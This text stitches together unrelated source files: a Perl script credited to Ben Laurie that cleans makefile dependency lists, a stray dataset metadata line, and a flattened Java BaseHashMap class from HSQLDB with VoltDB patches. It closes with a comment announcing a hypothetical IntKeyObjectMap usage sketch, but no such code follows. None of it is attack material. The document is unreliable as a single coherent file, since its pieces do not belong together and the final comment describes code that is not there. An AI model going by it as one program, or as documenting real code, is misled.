#!/usr/local/bin/perl -w
# Clean the dependency list in a makefile of standard includes...
# Written by Ben Laurie <[email protected]> 19 Jan 1999

use strict;

while(<STDIN>) {
    print;
    last if /^# DO NOT DELETE THIS LINE/;
}

my %files;

my $thisfile="";
while(<STDIN>) {
    my ($dummy, $file,$deps)=/^((.*):)? (.*)$/;
    my $origfile="";

    $thisfile=$file if defined $file;
    next if !defined $deps;
    $origfile=$thisfile;
    $origfile=~s/\.o$/.c/;
    my @deps=split ' ',$deps;
    @deps=grep(!/^\//,@deps);
    @deps=grep(!/^\\$/,@deps);
    @deps=grep(!/^$origfile$/,@deps);
    # pull out the kludged kerberos header (if present).
    @deps=grep(!/^[.\/]+\/krb5.h/,@deps);
    push @{$files{$thisfile}},@deps;
}

my $file;

foreach $file (sort keys %files) {
    my $len=0;
    my $dep;
    my $origfile=$file;

    $origfile=~s/\.o$/.c/;
    $file=~s/^\.\///;
    push @{$files{$file}},$origfile;
    my $prevdep="";

    # Remove leading ./ before sorting
    my @deps = map { $_ =~ s/^\.\///; $_ } @{$files{$file}};

    foreach $dep (sort @deps) {
        next if $prevdep eq $dep; # to exterminate duplicates...
        $prevdep = $dep;
        $len=0 if $len+length($dep)+1 >= 80;
        if($len == 0) {
            print "\n$file:";
            $len=length($file)+1;
        }
        print " $dep";
        $len+=length($dep)+1;
    }
}
print "\n";
{ "pile_set_name": "Github" }
/* Copyright (c) 2001-2009, The HSQL Development Group * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * Neither the name of the HSQL Development Group nor the names of its * contributors may be used to endorse or promote products derived from this * software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL HSQL DEVELOPMENT GROUP, HSQLDB.ORG, * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package org.hsqldb_voltpatches.store; import java.util.NoSuchElementException; import org.hsqldb_voltpatches.Expression; import org.hsqldb_voltpatches.ExpressionAggregate; import org.hsqldb_voltpatches.lib.ArrayCounter; import org.hsqldb_voltpatches.lib.Iterator; /** * Base class for hash tables or sets. The exact type of the structure is * defined by the constructor. Each instance has at least a keyTable array * and a HashIndex instance for looking up the keys into this table. Instances * that are maps also have a valueTable the same size as the keyTable. * * Special getOrAddXXX() methods are used for object maps in some subclasses. 
* * @author Fred Toussi (fredt@users dot sourceforge.net) * @version 1.9.0 * @since 1.7.2 */ public class BaseHashMap { /* data store: keys: {array of primitive | array of object} values: {none | array of primitive | array of object} same size as keys objects support : hashCode(), equals() implemented types of keyTable: {objectKeyTable: variable size Object[] array for keys | intKeyTable: variable size int[] for keys | longKeyTable: variable size long[] for keys } implemented types of valueTable: {objectValueTable: variable size Object[] array for values | intValueTable: variable size int[] for values | longValueTable: variable size long[] for values} valueTable does not exist for sets or for object pools hash index: hashTable: fixed size int[] array for hash lookup into keyTable linkTable: pointer to the next key ; size equal or larger than hashTable but equal to the valueTable access count table: {none | variable size int[] array for access count} same size as xxxKeyTable */ // boolean isIntKey; boolean isLongKey; boolean isObjectKey; boolean isNoValue; boolean isIntValue; boolean isLongValue; boolean isObjectValue; protected boolean isList; // private ValuesIterator valuesIterator; // protected HashIndex hashIndex; // protected int[] intKeyTable; protected Object[] objectKeyTable; protected long[] longKeyTable; // protected int[] intValueTable; protected Object[] objectValueTable; protected long[] longValueTable; // int accessMin; protected int accessCount; protected int[] accessTable; protected boolean[] multiValueTable; // final float loadFactor; final int initialCapacity; int threshold; int maxCapacity; protected int purgePolicy = NO_PURGE; protected boolean minimizeOnEmpty; // boolean hasZeroKey; int zeroKeyIndex = -1; // keyOrValueTypes protected static final int noKeyOrValue = 0; protected static final int intKeyOrValue = 1; protected static final int longKeyOrValue = 2; protected static final int objectKeyOrValue = 3; // purgePolicy protected static final int NO_PURGE = 0; protected static final int PURGE_ALL = 1; protected static final int PURGE_HALF = 2; protected static final int PURGE_QUARTER = 3; protected BaseHashMap(int initialCapacity, int keyType, int valueType, boolean hasAccessCount) throws IllegalArgumentException { if (initialCapacity <= 0) { throw new IllegalArgumentException(); } // CHERRY PICK to prevent a flaky crash? if (initialCapacity < 3) { initialCapacity = 3; } // End of CHERRY PICK to prevent a flaky crash? 
this.loadFactor = 1; // can use any value if necessary this.initialCapacity = initialCapacity; threshold = initialCapacity; if (threshold < 3) { threshold = 3; } int hashtablesize = (int) (initialCapacity * loadFactor); if (hashtablesize < 3) { hashtablesize = 3; } hashIndex = new HashIndex(hashtablesize, initialCapacity, true); int arraySize = threshold; if (keyType == BaseHashMap.intKeyOrValue) { isIntKey = true; intKeyTable = new int[arraySize]; } else if (keyType == BaseHashMap.objectKeyOrValue) { isObjectKey = true; objectKeyTable = new Object[arraySize]; } else { isLongKey = true; longKeyTable = new long[arraySize]; } if (valueType == BaseHashMap.intKeyOrValue) { isIntValue = true; intValueTable = new int[arraySize]; } else if (valueType == BaseHashMap.objectKeyOrValue) { isObjectValue = true; objectValueTable = new Object[arraySize]; } else if (valueType == BaseHashMap.longKeyOrValue) { isLongValue = true; longValueTable = new long[arraySize]; } else { isNoValue = true; } if (hasAccessCount) { accessTable = new int[arraySize]; } } protected int getLookup(Object key, int hash) { int lookup = hashIndex.getLookup(hash); Object tempKey; for (; lookup >= 0; lookup = hashIndex.getNextLookup(lookup)) { tempKey = objectKeyTable[lookup]; if (key.equals(tempKey)) { return lookup; } } return lookup; } // extended version for getLookup(Object key, int hash), except same Expression with different // queryTableColumnIndex are considered as different keys protected int getLookupSameIndex(Object key, int hash) { if (!(key instanceof Expression)) { return getLookup(key, hash); } Expression expression = (Expression) key; int lookup = hashIndex.getLookup(hash); Expression tempKey; for (; lookup >= 0; lookup = hashIndex.getNextLookup(lookup)) { tempKey = (Expression) objectKeyTable[lookup]; if (expression.equals(tempKey) && expression.queryTableColumnIndexEquals(tempKey)) { return lookup; } } return lookup; } protected int getLookup(int key) { int lookup = hashIndex.getLookup(key); int tempKey; for (; lookup >= 0; lookup = hashIndex.linkTable[lookup]) { tempKey = intKeyTable[lookup]; if (key == tempKey) { return lookup; } } return lookup; } protected int getLookup(long key) { int lookup = hashIndex.getLookup((int) key); long tempKey; for (; lookup >= 0; lookup = hashIndex.getNextLookup(lookup)) { tempKey = longKeyTable[lookup]; if (key == tempKey) { return lookup; } } return lookup; } protected Iterator getValuesIterator(Object key, int hash) { int lookup = getLookup(key, hash); if (valuesIterator == null) { valuesIterator = new ValuesIterator(); } valuesIterator.reset(key, lookup); return valuesIterator; } /** * generic method for adding or removing keys */ protected Object addOrRemove(long longKey, long longValue, Object objectKey, Object objectValue, boolean remove) { int hash = (int) longKey; if (isObjectKey) { if (objectKey == null) { return null; } hash = objectKey.hashCode(); } int index = hashIndex.getHashIndex(hash); int lookup = hashIndex.hashTable[index]; int lastLookup = -1; Object returnValue = null; for (; lookup >= 0; lastLookup = lookup, lookup = hashIndex.getNextLookup(lookup)) { if (isObjectKey) { // A VoltDB extension to prevent an intermittent NPE on catalogUpdate? if (objectKey.equals(objectKeyTable[lookup])) { /* disabled 1 line ... if (objectKeyTable[lookup].equals(objectKey)) { ... 
disabled 1 line */ // End of VoltDB extension break; } } else if (isIntKey) { if (longKey == intKeyTable[lookup]) { break; } } else if (isLongKey) { if (longKey == longKeyTable[lookup]) { break; } } } if (lookup >= 0) { if (remove) { if (isObjectKey) { objectKeyTable[lookup] = null; } else { if (longKey == 0) { hasZeroKey = false; zeroKeyIndex = -1; } if (isIntKey) { intKeyTable[lookup] = 0; } else { longKeyTable[lookup] = 0; } } if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; } else if (isIntValue) { intValueTable[lookup] = 0; } else if (isLongValue) { longValueTable[lookup] = 0; } hashIndex.unlinkNode(index, lastLookup, lookup); if (accessTable != null) { accessTable[lookup] = 0; } if (minimizeOnEmpty && hashIndex.elementCount == 0) { rehash(initialCapacity); } return returnValue; } if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = objectValue; } else if (isIntValue) { intValueTable[lookup] = (int) longValue; } else if (isLongValue) { longValueTable[lookup] = longValue; } if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } // not found if (remove) { return null; } if (hashIndex.elementCount >= threshold) { // should throw maybe, if reset returns false? if (reset()) { return addOrRemove(longKey, longValue, objectKey, objectValue, remove); } else { return null; } } lookup = hashIndex.linkNode(index, lastLookup); // type dependent block if (isObjectKey) { objectKeyTable[lookup] = objectKey; } else if (isIntKey) { intKeyTable[lookup] = (int) longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } else if (isLongKey) { longKeyTable[lookup] = longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } if (isObjectValue) { objectValueTable[lookup] = objectValue; } else if (isIntValue) { intValueTable[lookup] = (int) longValue; } else if (isLongValue) { longValueTable[lookup] = longValue; } // if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } // if the object added is an Aggregate expression, always add it to the set even it's already in the set // see ENG-18917 protected Object addOrRemoveAlwaysIfAggregate(long longKey, long longValue, Object objectKey, Object objectValue, boolean remove) { int hash = (int) longKey; if (isObjectKey) { if (objectKey == null) { return null; } hash = objectKey.hashCode(); } int index = hashIndex.getHashIndex(hash); int lookup = hashIndex.hashTable[index]; int lastLookup = -1; Object returnValue = null; for (; lookup >= 0; lastLookup = lookup, lookup = hashIndex.getNextLookup(lookup)) { if (isObjectKey) { // A VoltDB extension to prevent an intermittent NPE on catalogUpdate? 
if (objectKey.equals(objectKeyTable[lookup])) { if (!(objectKey instanceof ExpressionAggregate)) { break; } // End of VoltDB extension } } else if (isIntKey) { if (longKey == intKeyTable[lookup]) { break; } } else if (isLongKey) { if (longKey == longKeyTable[lookup]) { break; } } } if (lookup >= 0) { if (remove) { if (isObjectKey) { objectKeyTable[lookup] = null; } else { if (longKey == 0) { hasZeroKey = false; zeroKeyIndex = -1; } if (isIntKey) { intKeyTable[lookup] = 0; } else { longKeyTable[lookup] = 0; } } if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; } else if (isIntValue) { intValueTable[lookup] = 0; } else if (isLongValue) { longValueTable[lookup] = 0; } hashIndex.unlinkNode(index, lastLookup, lookup); if (accessTable != null) { accessTable[lookup] = 0; } if (minimizeOnEmpty && hashIndex.elementCount == 0) { rehash(initialCapacity); } return returnValue; } if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = objectValue; } else if (isIntValue) { intValueTable[lookup] = (int) longValue; } else if (isLongValue) { longValueTable[lookup] = longValue; } if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } // not found if (remove) { return null; } if (hashIndex.elementCount >= threshold) { // should throw maybe, if reset returns false? if (reset()) { return addOrRemove(longKey, longValue, objectKey, objectValue, remove); } else { return null; } } lookup = hashIndex.linkNode(index, lastLookup); // type dependent block if (isObjectKey) { objectKeyTable[lookup] = objectKey; } else if (isIntKey) { intKeyTable[lookup] = (int) longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } else if (isLongKey) { longKeyTable[lookup] = longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } if (isObjectValue) { objectValueTable[lookup] = objectValue; } else if (isIntValue) { intValueTable[lookup] = (int) longValue; } else if (isLongValue) { longValueTable[lookup] = longValue; } // if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } /** * generic method for adding or removing key / values in multi-value * maps */ protected Object addOrRemoveMultiVal(long longKey, long longValue, Object objectKey, Object objectValue, boolean removeKey, boolean removeValue) { int hash = (int) longKey; if (isObjectKey) { if (objectKey == null) { return null; } hash = objectKey.hashCode(); } int index = hashIndex.getHashIndex(hash); int lookup = hashIndex.hashTable[index]; int lastLookup = -1; Object returnValue = null; boolean multiValue = false; for (; lookup >= 0; lastLookup = lookup, lookup = hashIndex.getNextLookup(lookup)) { if (isObjectKey) { if (objectKeyTable[lookup].equals(objectKey)) { if (removeKey) { while (true) { objectKeyTable[lookup] = null; returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; hashIndex.unlinkNode(index, lastLookup, lookup); multiValueTable[lookup] = false; lookup = hashIndex.hashTable[index]; if (lookup < 0 || !objectKeyTable[lookup].equals( objectKey)) { return returnValue; } } } else { if (objectValueTable[lookup].equals(objectValue)) { if (removeValue) { objectKeyTable[lookup] = null; returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; hashIndex.unlinkNode(index, lastLookup, lookup); multiValueTable[lookup] = false; lookup = lastLookup; return returnValue; } else { return objectValueTable[lookup]; } } } multiValue = true; } } else if (isIntKey) { if (longKey 
== intKeyTable[lookup]) { if (removeKey) { while (true) { if (longKey == 0) { hasZeroKey = false; zeroKeyIndex = -1; } intKeyTable[lookup] = 0; intValueTable[lookup] = 0; hashIndex.unlinkNode(index, lastLookup, lookup); multiValueTable[lookup] = false; lookup = hashIndex.hashTable[index]; if (lookup < 0 || longKey != intKeyTable[lookup]) { return null; } } } else { if (intValueTable[lookup] == longValue) { return null; } } multiValue = true; } } else if (isLongKey) { if (longKey == longKeyTable[lookup]) { if (removeKey) { while (true) { if (longKey == 0) { hasZeroKey = false; zeroKeyIndex = -1; } longKeyTable[lookup] = 0; longValueTable[lookup] = 0; hashIndex.unlinkNode(index, lastLookup, lookup); multiValueTable[lookup] = false; lookup = hashIndex.hashTable[index]; if (lookup < 0 || longKey != longKeyTable[lookup]) { return null; } } } else { if (intValueTable[lookup] == longValue) { return null; } } multiValue = true; } } } if (removeKey || removeValue) { return returnValue; } if (hashIndex.elementCount >= threshold) { // should throw maybe, if reset returns false? if (reset()) { return addOrRemoveMultiVal(longKey, longValue, objectKey, objectValue, removeKey, removeValue); } else { return null; } } lookup = hashIndex.linkNode(index, lastLookup); // type dependent block if (isObjectKey) { objectKeyTable[lookup] = objectKey; } else if (isIntKey) { intKeyTable[lookup] = (int) longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } else if (isLongKey) { longKeyTable[lookup] = longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } if (isObjectValue) { objectValueTable[lookup] = objectValue; } else if (isIntValue) { intValueTable[lookup] = (int) longValue; } else if (isLongValue) { longValueTable[lookup] = longValue; } if (multiValue) { multiValueTable[lookup] = true; } // if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } /** * type-specific method for adding or removing keys in int->Object maps */ protected Object addOrRemove(int intKey, Object objectValue, boolean remove) { int hash = intKey; int index = hashIndex.getHashIndex(hash); int lookup = hashIndex.hashTable[index]; int lastLookup = -1; Object returnValue = null; for (; lookup >= 0; lastLookup = lookup, lookup = hashIndex.getNextLookup(lookup)) { if (intKey == intKeyTable[lookup]) { break; } } if (lookup >= 0) { if (remove) { if (intKey == 0) { hasZeroKey = false; zeroKeyIndex = -1; } intKeyTable[lookup] = 0; returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; hashIndex.unlinkNode(index, lastLookup, lookup); if (accessTable != null) { accessTable[lookup] = 0; } return returnValue; } if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = objectValue; } if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } // not found if (remove) { return returnValue; } if (hashIndex.elementCount >= threshold) { if (reset()) { return addOrRemove(intKey, objectValue, remove); } else { return null; } } lookup = hashIndex.linkNode(index, lastLookup); intKeyTable[lookup] = intKey; if (intKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } objectValueTable[lookup] = objectValue; if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } /** * type specific method for Object sets or Object->Object maps */ protected Object removeObject(Object objectKey, boolean removeRow) { if (objectKey == null) { return null; } int hash = objectKey.hashCode(); int index = 
hashIndex.getHashIndex(hash); int lookup = hashIndex.hashTable[index]; int lastLookup = -1; Object returnValue = null; for (; lookup >= 0; lastLookup = lookup, lookup = hashIndex.getNextLookup(lookup)) { if (objectKeyTable[lookup].equals(objectKey)) { objectKeyTable[lookup] = null; hashIndex.unlinkNode(index, lastLookup, lookup); if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; } if (removeRow) { removeRow(lookup); } return returnValue; } } // not found return returnValue; } protected boolean reset() { if (maxCapacity == 0 || maxCapacity > threshold) { rehash(hashIndex.linkTable.length * 2); return true; } else if (purgePolicy == PURGE_ALL) { clear(); return true; } else if (purgePolicy == PURGE_QUARTER) { clear(threshold / 4, threshold >> 8); return true; } else if (purgePolicy == PURGE_HALF) { clear(threshold / 2, threshold >> 8); return true; } else if (purgePolicy == NO_PURGE) { return false; } return false; } /** * rehash uses existing key and element arrays. key / value pairs are * put back into the arrays from the top, removing any gaps. any redundant * key / value pairs duplicated at the end of the array are then cleared. * * newCapacity must be larger or equal to existing number of elements. */ protected void rehash(int newCapacity) { int limitLookup = hashIndex.newNodePointer; boolean oldZeroKey = hasZeroKey; int oldZeroKeyIndex = zeroKeyIndex; if (newCapacity < hashIndex.elementCount) { return; } hashIndex.reset((int) (newCapacity * loadFactor), newCapacity); if (multiValueTable != null) { int counter = multiValueTable.length; while (--counter >= 0) { multiValueTable[counter] = false; } } hasZeroKey = false; zeroKeyIndex = -1; threshold = newCapacity; for (int lookup = -1; (lookup = nextLookup(lookup, limitLookup, oldZeroKey, oldZeroKeyIndex)) < limitLookup; ) { long longKey = 0; long longValue = 0; Object objectKey = null; Object objectValue = null; if (isObjectKey) { objectKey = objectKeyTable[lookup]; } else if (isIntKey) { longKey = intKeyTable[lookup]; } else { longKey = longKeyTable[lookup]; } if (isObjectValue) { objectValue = objectValueTable[lookup]; } else if (isIntValue) { longValue = intValueTable[lookup]; } else if (isLongValue) { longValue = longValueTable[lookup]; } if (multiValueTable == null) { addOrRemove(longKey, longValue, objectKey, objectValue, false); } else { addOrRemoveMultiVal(longKey, longValue, objectKey, objectValue, false, false); } if (accessTable != null) { accessTable[hashIndex.elementCount - 1] = accessTable[lookup]; } } resizeElementArrays(hashIndex.newNodePointer, newCapacity); } /** * resize the arrays contianing the key / value data */ private void resizeElementArrays(int dataLength, int newLength) { Object temp; int usedLength = newLength > dataLength ? 
dataLength : newLength; if (isIntKey) { temp = intKeyTable; intKeyTable = new int[newLength]; System.arraycopy(temp, 0, intKeyTable, 0, usedLength); } if (isIntValue) { temp = intValueTable; intValueTable = new int[newLength]; System.arraycopy(temp, 0, intValueTable, 0, usedLength); } if (isLongKey) { temp = longKeyTable; longKeyTable = new long[newLength]; System.arraycopy(temp, 0, longKeyTable, 0, usedLength); } if (isLongValue) { temp = longValueTable; longValueTable = new long[newLength]; System.arraycopy(temp, 0, longValueTable, 0, usedLength); } if (isObjectKey) { temp = objectKeyTable; objectKeyTable = new Object[newLength]; System.arraycopy(temp, 0, objectKeyTable, 0, usedLength); } if (isObjectValue) { temp = objectValueTable; objectValueTable = new Object[newLength]; System.arraycopy(temp, 0, objectValueTable, 0, usedLength); } if (accessTable != null) { temp = accessTable; accessTable = new int[newLength]; System.arraycopy(temp, 0, accessTable, 0, usedLength); } if (multiValueTable != null) { temp = multiValueTable; multiValueTable = new boolean[newLength]; System.arraycopy(temp, 0, multiValueTable, 0, usedLength); } } /** * clear all the key / value data in a range. */ private void clearElementArrays(final int from, final int to) { if (isIntKey) { int counter = to; while (--counter >= from) { intKeyTable[counter] = 0; } } else if (isLongKey) { int counter = to; while (--counter >= from) { longKeyTable[counter] = 0; } } else if (isObjectKey) { int counter = to; while (--counter >= from) { objectKeyTable[counter] = null; } } if (isIntValue) { int counter = to; while (--counter >= from) { intValueTable[counter] = 0; } } else if (isLongValue) { int counter = to; while (--counter >= from) { longValueTable[counter] = 0; } } else if (isObjectValue) { int counter = to; while (--counter >= from) { objectValueTable[counter] = null; } } if (accessTable != null) { int counter = to; while (--counter >= from) { accessTable[counter] = 0; } } if (multiValueTable != null) { int counter = to; while (--counter >= from) { multiValueTable[counter] = false; } } } /** * move the elements after a removed key / value pair to fill the gap */ void removeFromElementArrays(int lookup) { int arrayLength = hashIndex.linkTable.length; if (isIntKey) { Object array = intKeyTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); intKeyTable[arrayLength - 1] = 0; } if (isLongKey) { Object array = longKeyTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); longKeyTable[arrayLength - 1] = 0; } if (isObjectKey) { Object array = objectKeyTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); objectKeyTable[arrayLength - 1] = null; } if (isIntValue) { Object array = intValueTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); intValueTable[arrayLength - 1] = 0; } if (isLongValue) { Object array = longValueTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); longValueTable[arrayLength - 1] = 0; } if (isObjectValue) { Object array = objectValueTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); objectValueTable[arrayLength - 1] = null; } } /** * find the next lookup in the key/value tables with an entry * allows the use of old limit and zero int key attributes */ int nextLookup(int lookup, int limitLookup, boolean hasZeroKey, int zeroKeyIndex) { for (++lookup; lookup < limitLookup; lookup++) { if (isObjectKey) { if 
(objectKeyTable[lookup] != null) { return lookup; } } else if (isIntKey) { if (intKeyTable[lookup] != 0) { return lookup; } else if (hasZeroKey && lookup == zeroKeyIndex) { return lookup; } } else { if (longKeyTable[lookup] != 0) { return lookup; } else if (hasZeroKey && lookup == zeroKeyIndex) { return lookup; } } } return lookup; } /** * find the next lookup in the key/value tables with an entry * uses current limits and zero integer key state */ protected int nextLookup(int lookup) { for (++lookup; lookup < hashIndex.newNodePointer; lookup++) { if (isObjectKey) { if (objectKeyTable[lookup] != null) { return lookup; } } else if (isIntKey) { if (intKeyTable[lookup] != 0) { return lookup; } else if (hasZeroKey && lookup == zeroKeyIndex) { return lookup; } } else { if (longKeyTable[lookup] != 0) { return lookup; } else if (hasZeroKey && lookup == zeroKeyIndex) { return lookup; } } } return -1; } /** * row must already been freed of key / element */ protected void removeRow(int lookup) { hashIndex.removeEmptyNode(lookup); removeFromElementArrays(lookup); } /** * Clear the map completely. */ public void clear() { if (hashIndex.modified) { accessCount = 0; accessMin = accessCount; hasZeroKey = false; zeroKeyIndex = -1; clearElementArrays(0, hashIndex.linkTable.length); hashIndex.clear(); if (minimizeOnEmpty) { rehash(initialCapacity); } } } /** * Return the max accessCount value for count elements with the lowest * access count. Always return at least accessMin + 1 */ public int getAccessCountCeiling(int count, int margin) { return ArrayCounter.rank(accessTable, hashIndex.newNodePointer, count, accessMin + 1, accessCount, margin); } /** * This is called after all elements below count accessCount have been * removed */ public void setAccessCountFloor(int count) { accessMin = count; } public int incrementAccessCount() { return ++accessCount; } /** * Clear approximately count elements from the map, starting with * those with low accessTable ranking. * * Only for maps with Object key table */ protected void clear(int count, int margin) { if (margin < 64) { margin = 64; } int maxlookup = hashIndex.newNodePointer; int accessBase = getAccessCountCeiling(count, margin); for (int lookup = 0; lookup < maxlookup; lookup++) { Object o = objectKeyTable[lookup]; if (o != null && accessTable[lookup] < accessBase) { removeObject(o, false); } } accessMin = accessBase; } protected void resetAccessCount() { if (accessCount < Integer.MAX_VALUE) { return; } accessMin >>= 2; accessCount >>= 2; int i = accessTable.length; while (--i >= 0) { accessTable[i] >>= 2; } } public int capacity() { return hashIndex.linkTable.length; } public int size() { return hashIndex.elementCount; } public boolean isEmpty() { return hashIndex.elementCount == 0; } protected boolean containsKey(Object key) { if (key == null) { return false; } // CHERRY PICK to prevent a flaky crash? if (hashIndex.elementCount == 0) { return false; } // End of CHERRY PICK int lookup = getLookup(key, key.hashCode()); return lookup == -1 ? false : true; } protected boolean containsKey(int key) { // CHERRY PICK to prevent a flaky crash? if (hashIndex.elementCount == 0) { return false; } // End of CHERRY PICK int lookup = getLookup(key); return lookup == -1 ? false : true; } protected boolean containsKey(long key) { // CHERRY PICK to prevent a flaky crash? if (hashIndex.elementCount == 0) { return false; } // End of CHERRY PICK int lookup = getLookup(key); return lookup == -1 ? 
false : true; } protected boolean containsValue(Object value) { int lookup = 0; // CHERRY PICK to prevent a flaky crash? if (hashIndex.elementCount == 0) { return false; } // End of CHERRY PICK if (value == null) { for (; lookup < hashIndex.newNodePointer; lookup++) { if (objectValueTable[lookup] == null) { if (isObjectKey) { if (objectKeyTable[lookup] != null) { return true; } } else if (isIntKey) { if (intKeyTable[lookup] != 0) { return true; } else if (hasZeroKey && lookup == zeroKeyIndex) { return true; } } else { if (longKeyTable[lookup] != 0) { return true; } else if (hasZeroKey && lookup == zeroKeyIndex) { return true; } } } } } else { for (; lookup < hashIndex.newNodePointer; lookup++) { if (value.equals(objectValueTable[lookup])) { return true; } } } return false; } /** * Currently only for object maps */ protected class ValuesIterator implements org.hsqldb_voltpatches.lib.Iterator { int lookup = -1; Object key; private void reset(Object key, int lookup) { this.key = key; this.lookup = lookup; } public boolean hasNext() { return lookup != -1; } public Object next() throws NoSuchElementException { if (lookup == -1) { return null; } Object value = BaseHashMap.this.objectValueTable[lookup]; while (true) { lookup = BaseHashMap.this.hashIndex.getNextLookup(lookup); if (lookup == -1 || BaseHashMap.this.objectKeyTable[lookup].equals( key)) { break; } } return value; } public int nextInt() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public long nextLong() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public void remove() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public void setValue(Object value) { throw new NoSuchElementException("Hash Iterator"); } } protected class MultiValueKeyIterator implements Iterator { boolean keys; int lookup = -1; int counter; boolean removed; public MultiValueKeyIterator() { toNextLookup(); } private void toNextLookup() { while (true) { lookup = nextLookup(lookup); if (lookup == -1 || !multiValueTable[lookup]) { break; } } } public boolean hasNext() { return lookup != -1; } public Object next() throws NoSuchElementException { Object value = objectKeyTable[lookup]; toNextLookup(); return value; } public int nextInt() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public long nextLong() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public void remove() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public void setValue(Object value) { throw new NoSuchElementException("Hash Iterator"); } } /** * Iterator returns Object, int or long and is used both for keys and * values */ protected class BaseHashIterator implements Iterator { boolean keys; int lookup = -1; int counter; boolean removed; /** * default is iterator for values */ public BaseHashIterator() {} public BaseHashIterator(boolean keys) { this.keys = keys; } public boolean hasNext() { return counter < hashIndex.elementCount; } public Object next() throws NoSuchElementException { if ((keys && !isObjectKey) || (!keys && !isObjectValue)) { throw new NoSuchElementException("Hash Iterator"); } removed = false; if (hasNext()) { counter++; lookup = nextLookup(lookup); if (keys) { return objectKeyTable[lookup]; } else { return objectValueTable[lookup]; } } throw new NoSuchElementException("Hash Iterator"); } public int nextInt() throws NoSuchElementException { if ((keys && 
!isIntKey) || (!keys && !isIntValue)) { throw new NoSuchElementException("Hash Iterator"); } removed = false; if (hasNext()) { counter++; lookup = nextLookup(lookup); if (keys) { return intKeyTable[lookup]; } else { return intValueTable[lookup]; } } throw new NoSuchElementException("Hash Iterator"); } public long nextLong() throws NoSuchElementException { if ((!isLongKey || !keys)) { throw new NoSuchElementException("Hash Iterator"); } removed = false; if (hasNext()) { counter++; lookup = nextLookup(lookup); if (keys) { return longKeyTable[lookup]; } else { return longValueTable[lookup]; } } throw new NoSuchElementException("Hash Iterator"); } public void remove() throws NoSuchElementException { if (removed) { throw new NoSuchElementException("Hash Iterator"); } counter--; removed = true; if (BaseHashMap.this.isObjectKey) { if (multiValueTable == null) { addOrRemove(0, 0, objectKeyTable[lookup], null, true); } else { if (keys) { addOrRemoveMultiVal(0, 0, objectKeyTable[lookup], null, true, false); } else { addOrRemoveMultiVal(0, 0, objectKeyTable[lookup], objectValueTable[lookup], false, true); } } } else if (isIntKey) { addOrRemove(intKeyTable[lookup], 0, null, null, true); } else { addOrRemove(longKeyTable[lookup], 0, null, null, true); } if (isList) { // CHERRY PICK to prevent a flaky crash? removeRow(lookup); // End of CHERRY PICK lookup--; } } public void setValue(Object value) { if (keys) { throw new NoSuchElementException(); } objectValueTable[lookup] = value; } public int getAccessCount() { if (removed || accessTable == null) { throw new NoSuchElementException(); } return accessTable[lookup]; } public int getLookup() { return lookup; } } }
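// --------------------------------------------------------------------------
// A minimal usage sketch (not part of HSQLDB or VoltDB): the protected
// constructor, addOrRemove(int, Object, boolean) and getLookup(int) shown
// above are the whole surface a subclass needs in order to expose a simple
// int -> Object map. The class name IntKeyObjectMap and its public
// put/get/remove methods are hypothetical, introduced only for illustration.
// --------------------------------------------------------------------------

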